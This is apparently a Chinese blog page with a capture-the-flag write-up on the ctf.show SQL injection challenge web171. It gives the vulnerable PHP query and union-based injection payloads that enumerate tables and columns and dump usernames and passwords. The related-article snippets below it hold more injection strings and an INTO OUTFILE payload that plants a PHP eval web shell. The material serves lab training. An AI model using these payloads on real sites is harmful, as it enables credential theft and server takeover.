ctf.show(超详解)——sql注入web171-web182

原创

已于 2024-08-05 09:07:33 修改 · 809 阅读

12 ·

CC 4.0 BY-SA版权

文章标签：

#数据库

于 2024-07-28 22:54:33 首次发布

web171

sql语句
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

方法一：联合注入（union select）

判断闭合方式，本题为单引号闭合

查询表名：

1' UNION SELECT 1,table_name,3 from information_schema.tables where table_schema='ctfshow_web'--+

查询列名（字段名）：

1'union select 1,column_name,3 from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user'--+

查询字段值：

1' UNION SELECT 1,password,username from ctfshow_user --+

方法二：万能sql语句(1' or 1=1)

在进行判断时，永远为true：1' or 1=1

web172（联合注入）

进入

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

陌柒2333

关注关注

6
点赞
踩
12

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTF web入门之SQL注入

qq_41701460的博客

04-15

1033

HAVING子句用于对聚合数据进行筛选。它通常与GROUP BY一起使用。主要用于聚合函数的条件过滤，可以组合多个条件。十六进制：可以前面加x，后面用引号包裹或者0x；也可以和算数运算结合表示数字。#binascii 库：用于进行二进制数据和 ASCII 编码之间的转换，在本代码中主要用于将字符串转换为十六进制字符串。#requests 库：用于发送 HTTP 请求，在代码里会用它向目标网站发送 POST 请求来进行 SQL 注入尝试。#定义将字符串转换为十六进制字符串的函数。

ctfshow web-2(sql注入)

m0_73303597的博客

11-21

2137

自用

参与评论您还未登录，请先登录后发表或查看评论

ctf.show—Web（1-10）详细通关教程

热门推荐

wanan的博客

09-30

1万+

ctf.show的SQL注入(web171-web253)

CTFSHOW-sql注入

Yb_140的博客

08-13

2796

web171 最简单的sql注入，先演示基本操作 payload： -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select

ctf.show(超详解)——信息搜集web1-web20

2201_76115387的博客

07-28

520

CTF.show——信息搜集篇

CTFHub-web详解

shayebudon的博客

11-20

3665

信息泄露目录遍历遍历每一个文件夹，找到flag.txt，复制内容提交 PHPINFO 打开页面，从信息中寻找flag。备份文件下载网站源码尝试各种组合，最后发现在网站后添加www.zip后成功下载压缩文件将解压后的文件名放在url后，即可出现flag bak文件下载index.php.bak打开即可看到flag vim缓存当开发人员在线上环境中使用 vim 编辑器，在使用过程中会留下 vim 编辑器缓存，当vim异常退出时，缓存...

【CTF-Web】XSS漏洞学习笔记（附ctfshow web316-333题目）

brhhh_sehe的博客

12-19

1121

用户在输入框中输入图片地址存储到str变量中然后在xss()函数里面给id为demo的标签设置内容（innerHTML）内容是加载图片，所以我们输入时放一个无法加载的图片，然后触发onerror事件，在这个事件里面可以触发弹窗，注意构造payload的时候一定要把img标签进行闭合。自己语言的转义：我认为就是在该网站中，比如说存在留言功能，然后攻击者留言了一段恶意代码，这段留言是别的用户也可以访问到的，在其他用户查看这段留言的时候服务器进行解析，导致执行一些危险行为，这个整段过程就是跨站脚本攻击。

CTFSHOW easyrsa1-6 Writeup

abtgu的博客

09-17

2596

easyrsa1 题目：无解题思路：题中给了e，n，c，可以分解n得到p，q，在线分解大整数网址http://www.factordb.com/index.php 。脚本如下： import gmpy2 import binascii e = 65537 n = 1455925529734358105461406532259911790807347616464991065301847 c = 69380371057914246192606760686152233225659503366319332

【ctfshow--sql注入】

qq_74240553的博客

03-02

1297

ctfshow--sql

WEB ---- ctfshow ----- SQL注入

L0g1c的博客

06-24

504

看题目 //拼接sql语句查找指定ID用户我们能够控制的只有的值，经分析，条件为不为 flag。可是只有用户名为 flag 才能输出正确的flag。第一步先判断是否有注入点。观察到存在单引号，所以要考虑引号闭合问题。输入的内容被当作代码执行逻辑词 or 只要任意一个条件为真就算成立所以输入，可以列出所有的记录（数据）本来抱着测试注入点，不小心把 flag 测出来了，嘻嘻。正规做一下这个题，要想绕过，仔细观察得到与 id 使用逻辑运算符相连，所以使得 id 与一个不存在的数相等，就可以绕过打开题

CTFshow——SQL注入【Part 1】

D.MIND 的博客

03-10

997

web171—— 2' and 1=1 # 2' or 1=1 # 数据接口请求异常：parsererror 2' or 1=1 -- - 回显正常，且爆出所有信息，说明“-- -”其效果了。“#”这种注释方式不成功 2' union select 1,2 -- - 数据接口请求异常：parsererror 2' union select 1,2,3 -- - 成功回显1，2，3 2' union select 1,database(),group_concat(table_name) fro

CTFSHOW SQL注入篇（171-190）

羽的博客

06-07

2968

无过滤前言下面几道无过滤的题都可以写入shell 然后蚁剑连上后从数据库里面找,具体做法如下 id=0' union select 1,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 有的是查询的三项所以payload是 id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 接着

CTFSHOW SQL注入篇（191-210）

羽的博客

06-07

1442

ctfshow sql篇

CTFSHOW SQL注入篇（231-253）

羽的博客

06-11

2026

CTFSHOW SQL注入篇

CTFSHOW SQL注入篇（211-230）

羽的博客

06-09

1921

ctfshow SQL注入篇

ctfshow-sql注入

m0_72898152的博客

03-07

1005

ctf，sql注入